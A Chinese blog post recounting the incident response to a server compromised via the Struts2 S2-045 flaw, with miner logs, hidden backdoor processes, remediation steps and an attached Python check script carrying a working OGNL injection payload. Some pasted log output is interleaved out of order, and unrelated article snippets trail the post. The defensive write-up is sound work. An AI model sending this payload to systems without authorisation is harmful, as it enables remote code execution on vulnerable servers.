itstrong

再续服务器被肉鸡的经历-- struts2漏洞

[root@app130-33 ~]# cat myout.file 
YAM - Yet Another Miner by yvg1900
yam M7v-linux64-core2/yvg1900
**********************************************************************************************************
* Supported coins: PTS MMC MAX GRS DMD DVK MYR BCN QCN FCN XMR                                           *
* Author: yvg1900 (Twitter @yvg1900)                                                                     *
* XPT protocol: jh (http://ypool.net)                                                                    *
*                                                                                                        *
* Addresses for Thanks and Donations:                                                                    *
*   PTS: PZxsEQoiMeB6tHcW2ZySBEiCPio1WkxbEL                                                              *
*   XPM: AW2388DEWNEfMH4rP9kcj9yKcMq1QywYT4                                                              *
*   DTC: D6PmUogMigWvXurgFTqm5VLxQeVpXdYQj3                                                              *
*   MMC: MVk7PuJCa9o6qTYeiQRJDd3uHxKXMrQuU6                                                              *
*   LTC: Lby4YjhcAxhmbsdHFb4nYydrwGoiJezZt1                                                              *
*   BTC: 1FxekeK5La7AuF3oxiLzPKnjXyLMrux6VT                                                              *
*   NMC: N9KXqmzEqP7gB2dGHpEZiRMgFjUHNM38FR                                                              *
*   MAX: mTEsqg9dp3U9YXwduKxhhhDx1TRPBcNRvA                                                              *
*   NRS: 9qwyC34MCZ9XGopaNDNTnaMBtjAZhHvBd3                                                              *
*   GRS: FpHaQNJ2nMUc2kgBbzYue13E9VUfL8YbQp                                                              *
*   DMD: dEQZa7W7AczvUsjJkvWWrim1j8ZtgbAwXv                                                              *
*   DVK: D9o66V4h75JzWNpsaPidmKFVgwEf2DcDAX                                                              *
*   MYR: MFDpLPThL6D6vtWW42XobFNBpPdrJFPQb6                                                              *
*   XMR: 45w9aqVA6iVeMJ6jVHZPEyPqgVnBEAGhBBqGAW9ncXp44qbZy9vXkd2KpqYwcyVTQHF1kaSJm97GyceP3Y2dRMd7E9gyuZf *
*   BCN: 2AcGMZmmNWTiLvAg5n7ywMCAxXTxysYGsi1xzba2ok4UPccWTLqRyKN7EnQYUpEWpqBw1c9EVZrqo2CUG8f8mbjG5NA9njF *
*   QCN: 1V6wZP6aycYPbeafHxPcvaQfGs4M5kabHDQoTEsyCTT3HjccMyQbvEVNPoJuRc79XrPRYWESiAezyipWojpZ8bii3kczNgW *
*   FCN: 6rNjXkY5YQzWiTMmDUbL5gYTWx9UTdUMSA98S1G3cTmhZN9Xp6kq4woGeoK5Q8B3fPZV6TFKs36zdHpZnYxA4BFK3fLpJzW *
**********************************************************************************************************
Can not load config file [x]
Miner version: yam M7v-linux64-core2/yvg1900
Checking target [stratum+tcp://47CunEQ4v8FPVNnw9mDgNZeaiSo6SVDydB3AZM341ZtdYpBYNmYeqhh4mpU1X6RSmgBTfC8xqaAtUGC2DArotyaKSz1LJyj.f2bec1df3c6bf9a03c8ce785d333ff96bc65f9a2df0189a8635878d6d26ae814:[email protected]:8005:8050:8080:8100/xmr]...
Target OK
Checking XMR optimizations compatibility...
OK: XMR optimizations are compatible
Monero: Determine Algorithm Variation by finetuning
Using 16 CPU mining threads
  Will mine 96 rounds for miner developers to support development of the next version
  Follow @yvg1900 on Twitter to get information on new version availability on time
Monero Aggregated Hash/sec: ?; Rounds Complete/Incomplete: 0/0, Donated Complete/Incomplete: 0/0; Config/Worker Hash/sec: ?/? on 0 rounds with AV=1, ART=? ms; Fine-tuning: IN PROGRESS, AV/RT: 1/0, Best AV/RT: 1/0
  moria.dwarfpool.com: Connecting, Shares Submitted 0, Accepted 0
STRATUM-RPC2: Logged in with 47CunEQ4v8FPVNnw9mDgNZeaiSo6SVDydB3AZM341ZtdYpBYNmYeqhh4mpU1X6RSmgBTfC8xqaAtUGC2DArotyaKSz1LJyj.f2bec1df3c6bf9a03c8ce785d333ff96bc65f9a2df0189a8635878d6d26ae814
New Monero Block nTime 1489470304
New Monero Block nTime 1489470309
Monero Aggregated Hash/sec: ?; Rounds Complete/Incomplete: 0/0, Donated Complete/Incomplete: 0/0; Config/Worker Hash/sec: ?/? on 0 rounds with AV=1, ART=? ms; Fine-tuning: IN PROGRESS, AV/RT: 1/0, Best AV/RT: 1/0
  moria.dwarfpool.com: On-line, Shares Submitted 0, Accepted 0

处理过程：

服务:
[root@app130-33 bin]# date -u
2017年 03月 14日 星期二 06:15:29 UTC
[root@app130-33 bin]# date -R
Tue, 14 Mar 2017 14:18:03 +0800
[root@app130-33 bin]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:B6:38:21
inet addr:192.168.130.33 Bcast:192.168.130.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb6:3821/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1064663029 errors:0 dropped:0 overruns:0 frame:0
TX packets:902352525 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:507233208569 (472.3 GiB) TX bytes:634865464079 (591.2 GiB)
查看服务硬件
[root@app130-33 bin]# lspci
00:18.4 PCI bridge: VMware PCI Express Root Port (rev 01)
00:18.5 PCI bridge: VMware PCI Express Root Port (rev 01)
00:18.6 PCI bridge: VMware PCI Express Root Port (rev 01)
00:18.7 PCI bridge: VMware PCI Express Root Port (rev 01)
显示为VMware的虚拟机
看进程
[root@app130-33 bin]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 19364 1628 ? Ss 2016 0:52 /sbin/init
root 2 0.0 0.0 0 0 ? S 2016 0:00 [kthreadd]
#中间省略多数系统进程
root 236 0.0 0.0 0 0 ? S 2016 0:00 [kthrotld/15]
root 237 0.0 0.0 0 0 ? S 2016 0:00 [pciehpd]
root 239 0.0 0.0 0 0 ? S 2016 0:00 [kpsmoused]
root 240 0.0 0.0 0 0 ? S 2016 0:00 [usbhid_resumer]
root 270 0.0 0.0 0 0 ? S 2016 0:00 [kstriped]
root 336 0.0 0.0 94660 4988 ? Ssl 13:31 0:01 ./zou
root 375 0.0 0.0 0 0 ? S 2016 0:00 [scsi_eh_0]
root 376 0.0 0.0 0 0 ? S 2016 0:00 [scsi_eh_1]
root 415 0.0 0.0 11716 604 ? Ssl 13:31 0:00 /usr/bin/.sshd
root 463 0.0 0.0 0 0 ? S 2016 0:00 [scsi_eh_2]
root 464 0.0 0.0 0 0 ? S 2016 0:00 [vmw_pvscsi_wq_2]
root 506 0.0 0.0 0 0 ? S 2016 53:20 [jbd2/sda1-8]
root 507 0.0 0.0 0 0 ? S 2016 0:00 [ext4-dio-unwrit]
root 539 0.0 0.0 888 276 ? Ss 13:31 0:02 /etc/.zl
root 592 0.0 0.0 11296 1384 ? S122.192.218.121:7759 (ESTABLISHED)
[root@app130-33 bin]# lsof -p 975
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
.System 975 root cwd DIR 8,1 3514368 1703937 /tmp
.System 975 root rtd DIR 8,1 4096 2 /
.System 975 root txt REG 8,1 1820918 1450903 /etc/.System
.System 975 root mem REG 8,1 156928 796038 /lib64/ld-2.12.so
.System 975 root mem REG 8,1 1926800 796039 /lib64/libc-2.12.so
.System 975 root mem REG 8,1 113952 796046 /lib64/libresolv-2.12.so
.System 975 root mem REG 8,1 27424 786460 /lib64/libnss_dns-2.12.so
.System 975 root mem REG 8,1 65928 786462 /lib64/libnss_files-2.12.so
.System 975 root 0u IPv4 91810515 0t0 TCP app130-33:52331->123.135.128.178:29135 (ESTABLISHED)
[root@app130-33 bin]# lsof -p 7601
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
.yam 7601 root cwd DIR 8,1 4096 1179649 /root
.yam 7601 root rtd DIR 8,1 4096 2 /
.yam 7601 root txt REG 8,1 3867096 1450905 /etc/.yam
.yam 7601 root mem REG 8,1 156928 796038 /lib64/ld-2.12.so
[root@app130-33 bin]# lsof -p 18894
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
.sshd 18894 root cwd DIR 8,1 4096 1835318 /jboss-4.2.3/bin
.sshd 18894 root rtd DIR 8,1 4096 2 /
.sshd 18894 root txt REG 8,1 1223123 298354 /usr/bin/.sshd
.sshd 18894 root 0u CHR 1,3 0t0 3968 /dev/null
.sshd 18894 root 1u CHR 1,3 0t0 3968 /dev/null
.sshd 18894 root 2u CHR 1,3 0t0 3968 /dev/null
.sshd 18894 root 3uW REG 8,1 5 1703947 /tmp/moni.lod
服务登陆记录
[root@app130-33 bin]# last
root pts/2 192.168.10.47 Tue Mar 14 14:36 still logged in
root pts/8 192.168.10.86 Tue Mar 14 14:10 still logged in
root pts/7 192.168.10.47 Tue Mar 14 14:07 - 14:13 (00:05)
root pts/6 10.8.0.118 Tue Mar 14 14:05 still logged in
root pts/6 10.8.0.118 Tue Mar 14 14:00 - 14:04 (00:04)
wclog pts/4 10.8.1.158 Tue Mar 14 14:00 - 14:30 (00:30)
root pts/3 10.8.0.6 Tue Mar 14 13:58 still logged in
root pts/1 10.8.0.14 Tue Mar 14 13:46 still logged in
root pts/0 10.8.0.242 Tue Mar 14 13:42 still logged in
wclog pts/0 10.8.1.158 Tue Mar 14 12:19 - 12:49 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 11:49 - 12:19 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 11:19 - 11:49 (00:30)
.yam 7601 root mem REG 8,1 1926800 796039 /lib64/libc-2.12.so
.yam 7601 root mem REG 8,1 113952 796046 /lib64/libresolv-2.12.so
.yam 7601 root mem REG 8,1 27424 786460 /lib64/libnss_dns-2.12.so
.yam 7601 root mem REG 8,1 65928 786462 /lib64/libnss_files-2.12.so
.yam 7601 root 0r CHR 1,3 0t0 3968 /dev/null
.yam 7601 root 1w REG 8,1 76373 1190862 /root/myout.file
.yam 7601 root 2w REG 8,1 76373 1190862 /root/myout.file
.yam 7601 root 3u REG 0,9 0 3966 [eventfd]
.yam 7601 root 4u REG 0,9 0 3966 [eventpoll]
.yam 7601 root 5u REG 0,9 0 3966 [timerfd]
.yam 7601 root 6u IPv4 92265271 0t0 TCP app130-33:22516->ns377151.ip-94-23-55.eu:mxi .yam 7601 root 7r FIFO 0,8 0t0 91921852 pipe
.yam 7601 root 8w FIFO 0,8 0t0 91921852 pipe
[root@app130-33 bin]# lsof -p 18785
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
zou 18785 root cwd DIR 8,1 4096 1835318 /jboss-4.2.3/bin
zou 18785 root rtd DIR 8,1 4096 2 /
zou 18785 root txt REG 8,1 1223123 1839010 /jboss-4.2.3/bin/zou
zou 18785 root 0u CHR 1,3 0t0 3968 /dev/null
zou 18785 root 1u CHR 1,3 0t0 3968 /dev/null
zou 18785 root 2u CHR 1,3 0t0 3968 /dev/null
zou 18785 root 3uW REG 8,1 5 1703940 /tmp/gates.lod
zou 18785 root 4u IPv4 92281673 0t0 TCP app130-33:6097->122.192.218.121:7759 (SYN_SENT)
[root@app130-33 bin]# lsof -p 23720
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
.lz148947 23720 root cwd DIR 8,1 4096 1835318 /jboss-4.2.3/bin
.lz148947 23720 root rtd DIR 8,1 4096 2 /
.lz148947 23720 root txt REG 8,1 727556 1703943 /tmp/.lz1489471809
.lz148947 23720 root 0r CHR 1,3 0t0 3968 /dev/null
.lz148947 23720 root 1w FIFO 0,8 0t0 91799092 pipe
.lz148947 23720 root 2w FIFO 0,8 0t0 91799092 pipe
.lz148947 23720 root 3r IPv4 92165385 0t0 TCP app130-33:ewctsp->222.186.59.156:exp1
服务登陆记录
[root@app130-33 bin]# last
root pts/2 192.168.10.47 Tue Mar 14 14:36 still logged in
root pts/8 192.168.10.86 Tue Mar 14 14:10 still logged in
root pts/7 192.168.10.47 Tue Mar 14 14:07 - 14:13 (00:05)
root pts/6 10.8.0.118 Tue Mar 14 14:05 still logged in
root pts/6 10.8.0.118 Tue Mar 14 14:00 - 14:04 (00:04)
wclog pts/4 10.8.1.158 Tue Mar 14 14:00 - 14:30 (00:30)
root pts/3 10.8.0.6 Tue Mar 14 13:58 still logged in
root pts/1 10.8.0.14 Tue Mar 14 13:46 still logged in
root pts/0 10.8.0.242 Tue Mar 14 13:42 still logged in
wclog pts/0 10.8.1.158 Tue Mar 14 12:19 - 12:49 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 11:49 - 12:19 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 11:19 - 11:49 (00:30)
root pts/1 10.8.0.6 Tue Mar 14 11:08 - 11:38 (00:30)
wclog pts/2 10.8.0.90 Tue Mar 14 10:51 - 14:13 (03:21)
wclog pts/2 10.8.0.90 Tue Mar 14 10:50 - 10:51 (00:00)
wclog pts/0 10.8.1.158 Tue Mar 14 10:49 - 11:19 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 10:19 - 10:49 (00:30)
root pts/1 10.8.0.118 Tue Mar 14 10:12 - 10:56 (00:43)
wclog pts/6 10.8.0.90 Tue Mar 14 10:04 - 10:52 (00:48)
wclog pts/5 10.8.0.26 Tue Mar 14 10:03 - 14:31 (04:27)
root pts/4 10.8.0.242 Tue Mar 14 10:00 - 10:21 (00:21)
root pts/3 10.8.0.6 Tue Mar 14 09:55 - 10:25 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 09:48 - 10:18 (00:30)
root tty1 Tue Mar 14 09:48 - 10:18 (00:30)
wclog pts/2 10.8.0.38 Tue Mar 14 09:43 - 10:13 (00:30)
root pts/1 10.8.0.14 Tue Mar 14 09:40 - 10:10 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 09:18 - 09:48 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 08:48 - 09:18 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 08:18 - 08:48 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 07:48 - 08:18 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 07:18 - 07:48 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 06:48 - 07:18 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 06:18 - 06:48 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 05:48 - 06:18 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 05:17 - 05:48 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 04:47 - 05:17 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 04:17 - 04:47 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 03:47 - 04:17 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 03:17 - 03:47 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 02:47 - 03:17 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 02:17 - 02:47 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 01:47 - 02:17 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 01:17 - 01:47 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 00:47 - 01:17 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 00:17 - 00:47 (00:30)
sshd在线情况
[root@app130-33 bin]# w
14:38:45 up 105 days, 2:57, 6 users, load average: 11.31, 12.82, 13.96
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 10.8.0.242 13:42 26.00s 6:01 0.39s -bash
root pts/1 10.8.0.14 13:46 3:15 0.11s 0.11s -bash
root pts/2 192.168.10.47 14:36 2.00s 0.03s 0.03s -bash
root pts/3 10.8.0.6 13:58 41.00s 0.06s 0.06s -bash
root pts/6 10.8.0.118 14:05 2:46 0.30s 0.30s -bash
root pts/8 192.168.10.86 14:10 0.00s 0.30s 0.00s w
杀掉可以进程，中断***活动
[root@app130-33 bin]# kill -9 336 415 539 975 976 980 7601 18785 18894 23720
查***文件的时间
[root@app130-33 tmp]# stat .lz1489471809
File: ".lz1489471809"
Size: 727556 Blocks: 1424 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1703943 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 14:10:11.719101612 +0800
Modify: 2017-03-11 20:27:26.000000000 +0800
Change: 2017-03-14 14:10:11.701101612 +0800
[root@app130-33 tmp]# stat /jboss-4.2.3/bin/zou
File: "/jboss-4.2.3/bin/zou"
Size: 1223123 Blocks: 2392 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1839010 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 14:03:13.938101936 +0800
Modify: 2017-03-14 14:03:12.907101936 +0800
Change: 2017-03-14 14:44:23.231100024 +0800
[root@app130-33 tmp]# stat /usr/bin/.sshd
File: "/usr/bin/.sshd"
Size: 1223123 Blocks: 2392 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 298354 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 14:03:22.632101929 +0800
Modify: 2017-03-14 14:03:21.593101930 +0800
Change: 2017-03-14 14:03:21.593101930 +0800
[root@app130-33 tmp]# stat /tmp/moni.lod
File: "/tmp/moni.lod"
Size: 5 Blocks: 8 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1703947 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 14:26:49.952100839 +0800
Modify: 2017-03-14 14:03:23.011101928 +0800
Change: 2017-03-14 14:10:09.624101613 +0800
[root@app130-33 tmp]# stat /etc/.zl
File: "/etc/.zl"
Size: 727556 Blocks: 1424 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1450898 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 13:31:28.539103410 +0800
Modify: 2017-03-11 20:27:26.000000000 +0800
Change: 2017-03-14 13:31:28.489103410 +0800
[root@app130-33 tmp]# stat /etc/.System
File: "/etc/.System"
Size: 1820918 Blocks: 3560 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1450903 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 13:32:05.150103382 +0800
Modify: 2017-03-14 01:30:04.000000000 +0800
Change: 2017-03-14 13:32:05.149103382 +0800
[root@app130-33 tmp]# stat /tmp/dbuspm-session
stat: 无法获取"/tmp/dbuspm-session" 的文件状态(stat): 没有那个文件或目录
[root@app130-33 tmp]# stat /etc/.yam
File: "/etc/.yam"
Size: 3867096 Blocks: 7560 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1450905 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 13:45:01.844102781 +0800
Modify: 2017-02-23 03:24:45.000000000 +0800
Change: 2017-03-14 13:44:44.652102794 +0800
[root@app130-33 tmp]# stat /root/myout.file
File: "/root/myout.file"
Size: 21706 Blocks: 56 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1190862 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 14:38:03.267100318 +0800
Modify: 2017-03-14 14:47:42.544099870 +0800
Change: 2017-03-14 14:47:42.544099870 +0800
[root@app130-33 tmp]# stat /tmp/gates.lod
File: "/tmp/gates.lod"
Size: 5 Blocks: 8 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1703940 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 14:03:16.205101934 +0800
Modify: 2017-03-14 14:03:16.205101934 +0800
Change: 2017-03-14 14:10:09.624101613 +0800

问题分析：已经确认漏洞点是在struts2，在几个确定的版本中，struts2会执行http请求header的content-type中的代码，

***者可以直接利用这个漏洞在应用所在的服务器上篡改各种命令，生成各种***，从而导致应用所在的服务器轮为DDOS的肉鸡或挖矿工具，更为甚者导致数据泄露。

解决方案:

1. 根据***的特征，编写相应的脚本每分钟做扫描，定时终止***进程，保证***没有可执行环境。

2. 根据***目前***的位置，定时删除相应目录下的可执行文件，保证***没有可执行的内容。

3. 降低jboss进程在操作系统的权限，改为非root用户启动，预防被攻入后***可以随意在系统篡改内容。

4. 根据apache官方和安全网站的建议，修改struts2对于content-type执行的判断，拒绝非法内容的执行。

5. 升级struts2的版本到制定版本

附件：struts2检测脚本

import requests
import sys
 
def poc(url):

    payload = "%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"

    headers = {}

    headers["Content-Type"] = payload

    r = requests.get(url, headers=headers)

    if "105059592" in r.content:

        return True
 

    return False



if __name__ == '__main__':

##    if len(sys.argv) == 1:
##
##        print "python s2-045.py target"
##
##        sys.exit()

    if poc("http://www.XXXXX.com/XXX/"):

        print "vulnerable"

    else:

        print "not vulnerable"

参考资料：

http://8btc.com/article-1880-1.html

https://www.secpulse.com/archives/56570.html

ARM V8 base instruction -- Debug instructions xiaozhiwise Assembly arm
/**Debuginstructions*/BRK#imm16进入monitormodedebug，那里有on-chipdebugmonitorcodeHLT#imm16进入haltmodedebug，连接有外部调试硬件
炒币好还是挖矿好？区块链大社会
炒币好还是挖矿好？相信这个问题对于很多初入行的朋友来说是个不小的问题，小编也经常会被问到类似问题。为此，本文专门针对这个问题做一下分析，供各位朋友们参考。在比特币世界里，有些非常有意思的比喻，像挖金子一样“挖”比特币叫做“挖矿”，挖比特币的人被称为“矿工”，而用于“挖”比特币的电脑被称为“矿机”。而“炒币”就像炒股，直接在交易平台购买数字货币进行交易，不需要“挖”，只要将法币兑换成某种数字货币，再
python错误集锦--类型错误：‘NoneType‘ object is not subscriptable 程序员的修养 python python 开发语言后端
python类型错误：‘NoneType’objectisnotsubscriptable网上查到的原因和方案如下，但是小编给变量的命名不太像系统内置关键字。原因：变量使用了系统内置的关键字list解决：重新定义下这个变量小编需求是获取网络数据，从中获取某个key的值然后赋值给变量，代码如下targetData=monitorData['MonitorData’]既然是网络数据就有可能没有这个ke
回望2018…… 杨天义
图片发自App这篇文章是2018年的007最后一次作业，时间飞逝，转眼间一年又过去了，如果不看自己的文章，还真不知道今年是如何度过的？唯一能回想的就是比特币大跌、婚姻危机、冥想，其他都很模糊。回看过往文章，恍惚就像昨天刚刚发生的一样，可心境已经大不相同，当初遇到的困难，现在再回头看看，其实也没那么糟糕，当初想不明白的事情，现在瞬间清晰了很多。看着文字间记录着生活中点点滴滴，即幸福又感动，让我仿佛有
比特币，跨时代的产物宇智波士郎
图片发自App2017，随着比特币价格大爆发，创造出了一大批财富神话。吸引无数人前往币圈，无数数字货币诞生，价格疯狂到让人失了智。区块链，比特币运行的底层机制。有人认为，区块链对人类的发展比比特币自身更为重要。有些政府甚至只要区块链，而不要比特币。但是，区块链最为重要的特性便是去中心化，比特币的奖励机制完美的解决了去中心化这个问题。所以比特币比区块链更为重要，比特币就是中本聪先生，为了反抗现代金融
为什么要学习使用C++常用软件分析工具？学会这些工具都有哪些好处？ dvlinker C/C++软件开发从入门到实战 C/C++实战专栏 c++常用分析工具 WIndbg IDA Depends ProcessExplorer Process Monitor
目录1、为什么要学习使用C++软件常用分析工具？2、C++软件常用分析工具有哪些？都能处理哪些具体的问题？2.1、窗口信息查看工具SPY++2.2、模块依赖关系查看工具DependencyWalker2.3、GDI对象查看器GDIView2.4、进程信息查看工具ProcessExplorer2.5、进程活动监测工具ProcessMonitor2.6、函数调用监测工具APIMonitor2.7、调试
linux脚本监控重启shell脚本,CentOS系统的监控进程状态并自动重启的shell脚本小雨芝时节
在CentOS系统中利用Crontab监控进程是否被结束并自动重启。附加每天凌晨4点自动重启服务器。1、编辑Crontabcrontab-e2、按i进行编辑*/1****/root/monitor.sh#每分钟运行一遍monitor.sh脚本05***/sbin/reboot#每天凌晨5点自动重启服务器12*/1****/root/monitor.sh#每分钟运行一遍monitor.sh脚本05*
【干货】你可能不知道的 20个 Linux 网络工具迷途不归路
转载自公众号：DevOps技术栈原文链接：http://linoxide.com/monitoring-2/network-monitoring-tools-linux/如果要在你的系统上监控网络，那么使用命令行工具是非常实用的，并且对于Linux用户来说，有着许许多多现成的工具可以使用，如：nethogs,ntopng,nload,iftop,iptraf,bmon,slurm,tcptrack
有三套房还要挖矿,男子称手痒停不下来 IPFS资讯俱乐部
我们经常说挖矿赚钱，想必大家都想知道这些币价值几何，这里提供部分币种今日的情况供大家参考。看完这些是不是激发了大家伙学习的欲望，下面开始步入正题啦！当你有IPFS时，你可以开始以一种特定的方式查看其他所有东西，并且你会意识到其它方式都是多余的。市面上关于IPFS的资料较少，本节将尝试性的提出个人的见解。IPFS开始作为胡安贝内努力建立一个系统，可以快速的移动版本化的科学数据。版本控制使您能够跟踪随
016 币币置换思考叶雷雷
这周数字货币GBI从20900多高点一路下跌到16800，btc下跌最剧烈。前期用部分eos置换了一点btc，这段时间没有法币，用btc又置换了一些big和dew。big和dew没有白名单，现在买入的成本是白名单的近十倍价格。我为什么用这么高的成本买入呢，这两个代币是币币交易所的代币，数量会随着时间递减，且它的价值应该符合指数曲线递增型。有人分析了数字货币领域最赚钱的三个方向，分叉，开交易所，挖矿
读《区块链从数字货币到信用社会》——数字货币17 读书游轮
第五章区块链怎么玩一、数字货币(一)总量恒定型：比特币发行依照收敛曲线这些特性来看，比特币类似黄金。黄金总量有限、开采需要一定成本。然而，比特币可以跨地域转移、几乎可无限分割、可编程、易保管等特性完胜黄金这种几千年来人类世界共通的价值存储手段。（二）锚定型：比特股（三）政府发行型：中央数字货币
优利优聚投资多少钱可靠吗？优利优聚骗局内幕曝光清风导师
优利优聚(优利优剧)是什么项目?优利优聚APP投资有多少钱可靠吗?到底优利优聚是真的还是骗局内幕曝光!优利优聚的近期上线的一款类似于潮玩宇宙+短剧+金币挖矿模式的手机兼职项目，因为才上线几天热度还是不错的，说实话关于优利优聚是真的还是套路骗局的问题，个人建议前期可以撸一下，后期就算了，这类项目现在多如牛毛所以如果要说某一个可以长期的话只能赌一把，整体而言都并非长远优选!优利优聚是什么项目?是骗局还
BKFUND许超逸：Token为基金管理行业带来新空白市场机会西瓜一个勺
编者按：许超逸是BKFUND创始管理合伙人、Hashgard创始人，拥有多年VC股权投资经验。去年，他还在忙着到处做区块链普及和布道工作，而今年的舆论领域已鲜少见到他的身影，因为，他正在着重打造TokenFund领域里的管理规范，希望能成为行业规范的标杆。本文，他向耳朵财经分享了他的行业认知：1、区块链认知三阶段；2、从认识比特币到早期企业融资工具；3、关于投资Token的基金管理领域现在仍是空白
2018-07-02 FusionBlock
融数链受邀参加亚洲数字资产和区块链应用峰会日本是最早拥抱区块链和比特币的国家之一，在交易所兑换排名中，日元仅次于USDT（锚定美元的货币），2016年，日本批准了对数字货币的监管法案，2017年4月1日，日本内阁签署的《支付服务修正法案》正式生效，2017年7月份，日本正式停止收取比特币交易8%的消费税。2017年9月29，日本金融厅颁发了第一批比特币交易所牌照。10月起，日本金融厅开始对日本比币
比特币是当代鸦片贸易，区块链则是金融贩毒网络还不是一门
我们都知道，中国屈辱的近代史，是从鸦片战争开始的。先是英国挑起第一次鸦片战争，接着是英法挑起第二次鸦片战争，再接着是日本挑起甲午战争，最后是八国联军侵华战争。最后导致中国遍地都是租界，彻底沦为了蛮夷们的殖民地。从鸦片战争开始，这一百多年，中国的对外战争和外交，一次比一次屈辱，腐朽的建奴殖民统治，面对比他们更野蛮的蛮夷殖民者，建奴奉行卖国政策，把中国带入了亡国亡种的边缘。爆发鸦片战争的契机，则是因为
比特币五彩冰峰
#基础科普##区块链理论概念#王煜全讲关于区块链与ICO01ICO：酝酿巨大风险的机会1、ICO是什么；2、比特币；3、区块链技术；02关于比特币1、比特币白话介绍；2、比特币的起源；3、关于中本聪；03以太坊会是比特币之后的投资机会吗1、以太坊与智能合约系统；2、以太坊与ICO；3、相对比特币，以太坊的特色；04ICO是机会还是庞氏骗局1、庞氏骗局的事件与分析；2、不同角度分析ICO；3、ICO
存有最多BTC钱包，你敢动吗？ lancexia
3D2oetdNuZUqQHPJmcMDDHYoqkyNVsFk9r庄家钱包你用穷举法，找到了世界上最富有的比特币地址私钥。（比特币私钥几乎是不可能用穷举法找到，具体细节可以参照汤强这篇文章）这寻找难度堪比全宇宙寻找一粒沙子的私钥，竟然被你找到，接下来就只有一个问题，要不要下手。假如你已经下定决心，偷出所有比特币并卖出，那么接下来怎么做？各大交易所每天面对成千上万黑客，对着交易所、钱包数千次攻击，
用正则表达式过滤logcat中的多个tag的日志 fc82bb084ee7
在AndroidStudio中,在过滤器的byLogTag选项中配置.我配置了2个tagfilter方便开发,1.multi-tag-filter2.ignore-multi-tag-filter.过滤出指定tag的日志信息^(?:Watchdog|InputReader|ahking)Watchdog忽略指定tag的日志信息^(?!WifiMonitor|WifiHW)有些tag的无用log非常
玄机alog挖矿应急呆呆的羊网络 web安全
这里我主要介绍一下思路，因为我在做的时候发现可能是环境的问题，有时候同一个命令的执行结果是不一样的，有时候有结果，有时候啥都没有。1.首先要认识这里是靶场，所以此时的设备并没有与靶场建立连接，而是处于断开连接的状态，我们要做的就是上机排查相关日志、权限维持的相关手段等，还原攻击者的链路和人物画像。2.crontab-l查看计划任务，找到了可疑的执行文件3.计算文件的md5值，然后放到微步上分析一下
